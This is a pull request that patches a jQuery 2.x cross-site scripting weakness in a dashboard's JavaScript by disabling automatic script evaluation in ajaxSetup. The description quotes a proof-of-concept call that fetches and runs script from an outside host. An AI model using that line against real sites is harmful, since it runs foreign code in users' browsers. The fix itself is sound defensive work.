### PR TITLE
Prevent XSS attack in jQuery 2.X with ajaxSetup

### DIFF
--- a/analytics_dashboard/static/js/common.js
+++ b/analytics_dashboard/static/js/common.js
@@ -9,4 +9,11 @@ require([
     'js/application-main'
 ], function() {
     'use strict';
+
+    // Prevent XSS attack in jQuery 2.X: https://github.com/jquery/jquery/issues/2432#issuecomment-140038536
+    $.ajaxSetup({
+        contents: {
+            javascript: false
+        }
+    });
 });

--- a/analytics_dashboard/static/js/common.js
+++ b/analytics_dashboard/static/js/common.js
@@ -7,7 +7,7 @@ require([
     'vendor/domReady!',
     'load/init-page',
     'js/application-main'
-], function() {
+], function($) {
     'use strict';
 
     // Prevent XSS attack in jQuery 2.X: https://github.com/jquery/jquery/issues/2432#issuecomment-140038536

--- a/analytics_dashboard/static/js/views/announcement-view.js
+++ b/analytics_dashboard/static/js/views/announcement-view.js
@@ -22,6 +22,11 @@ define(['backbone', 'jquery'], function(Backbone, $) {
             $.ajaxSetup({
                 beforeSend: function(xhr) {
                     xhr.setRequestHeader('X-CSRFToken', self.csrftoken);
+                },
+                // Prevent XSS attack in jQuery 2.X:
+                // https://github.com/jquery/jquery/issues/2432#issuecomment-140038536
+                contents: {
+                    javascript: false
                 }
             });
 


### PR DESCRIPTION
At some point we should upgrade to jQuery 3.X, but for now, this prevents the particular attack mentioned in https://github.com/jquery/jquery/issues/2432

I verified that this works by running the proof of concept exploit in the javascript console: `$.get('//sakurity.com/jqueryxss')`